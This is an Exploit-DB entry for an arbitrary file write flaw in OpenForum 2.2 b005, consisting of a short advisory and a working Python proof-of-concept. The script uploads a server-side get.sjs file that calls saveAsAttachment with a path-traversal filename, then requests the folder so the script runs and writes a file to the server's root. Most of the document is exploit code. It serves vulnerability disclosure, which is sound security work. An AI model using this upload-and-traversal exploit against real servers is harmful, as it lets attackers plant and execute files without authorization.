OpenForum 2.2 b005 - 'saveAsAttachment()' Method Arbitrary File Creation

EDB-ID:

34035

CVE:

N/A




Platform:

PHP

Date:

2010-05-23


# source: https://www.securityfocus.com/bid/40364/info
# 
# OpenForum is prone to a vulnerability that may allow remote attackers to create arbitrary files on a vulnerable system.
# 
# Successful exploits will allow an attacker to create arbitrary files, which may then be executed to perform unauthorized actions. This may aid in further attacks.
#
# OpenForum 2.2 b005 is vulnerable; other versions may also be affected.
#

#============================================================================================================#
#   _      _   __   __       __        _______    _____      __ __     _____     _      _    _____  __ __    #
#  /_/\  /\_\ /\_\ /\_\     /\_\     /\_______)\ ) ___ (    /_/\__/\  ) ___ (   /_/\  /\_\ /\_____\/_/\__/\  #
#  ) ) )( ( ( \/_/( ( (    ( ( (     \(___  __\// /\_/\ \   ) ) ) ) )/ /\_/\ \  ) ) )( ( (( (_____/) ) ) ) ) #
# /_/ //\\ \_\ /\_\\ \_\    \ \_\      / / /   / /_/ (_\ \ /_/ /_/ // /_/ (_\ \/_/ //\\ \_\\ \__\ /_/ /_/_/  #
# \ \ /  \ / // / // / /__  / / /__   ( ( (    \ \ )_/ / / \ \ \_\/ \ \ )_/ / /\ \ /  \ / // /__/_\ \ \ \ \  #
#  )_) /\ (_(( (_(( (_____(( (_____(   \ \ \    \ \/_\/ /   )_) )    \ \/_\/ /  )_) /\ (_(( (_____\)_) ) \ \ #
#  \_\/  \/_/ \/_/ \/_____/ \/_____/   /_/_/     )_____(    \_\/      )_____(   \_\/  \/_/ \/_____/\_\/ \_\/ #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# Vulnerability............Arbitrary File Write                                                              #
# Software.................Open Forum Server 2.2 b005                                                        #
# Download.................http://code.google.com/p/open-forum                                               #
# Date.....................5/23/10                                                                           #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# Site.....................http://cross-site-scripting.blogspot.com/                                         #
# Email....................john.leitch5@gmail.com                                                            #
#                                                                                                            #
#============================================================================================================#
#                                                                                                            #
# ##Description##                                                                                            #
#                                                                                                            #
# An arbitrary file write vulnerability in the saveAsAttachment method of Open Forum Server 2.2 b005 can be  #
# exploited to write to the local file system of the server.                                                 #
#                                                                                                            #
#                                                                                                            #
# ##Exploit##                                                                                                #
#                                                                                                            #
# Upload a get.sjs file that calls the vulnerable method. Request the script's containing folder.            #
#                                                                                                            #
#                                                                                                            #
# ##Proof of Concept##                                                                                       #
#                                                                                                            #
import sys, socket
host = 'localhost'
port = 80

def send_request(request):
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    s.settimeout(32) # sometimes it takes a while
    s.connect((host, port))
    s.send(request)

    response = s.recv(8192) + s.recv(8192) # a hack within a hack   

    return response

def write_file():
    try:
        content = '----x--\r\n'\
                  'Content-Disposition: form-data; name="file"; filename="get.sjs"\r\n'\
                  'Content-Type: application/octet-stream\r\n\r\n'\
                  'fileName = "' + '..\\\\' * 256 + 'x.txt";\r\n'\
                  'data = "hello, world";\r\n'\
                  'user = transaction.getUser();\r\n'\
                  'wiki.saveAsAttachment("x",fileName,data,user);\r\n'\
                  'transaction.sendPage("File Written");\r\n\r\n'\
                  '----x----\r\n'
        
        response = send_request('POST OpenForum/Actions/Attach?page=OpenForum HTTP/1.1\r\n'
                                'Host: ' + host + '\r\n'
                                'Content-Type: multipart/form-data; boundary=--x--\r\n'
                                'Content-Length: ' + str(len(content)) + '\r\n\r\n' + content)

        if 'HTTP/1.1 302 Redirect' not in response:
            print 'Error writing get.sjs'
            return
        else: print 'get.sjs created'
        
        response = send_request('GET OpenForum HTTP/1.1\r\n'
                                'Host: ' + host + '\r\n\r\n')

        if 'File Written' not in response:
            print 'Error writing to root'
            return
        else: print 'x.txt created in root'
        
    except Exception:
        print sys.exc_info()          

write_file()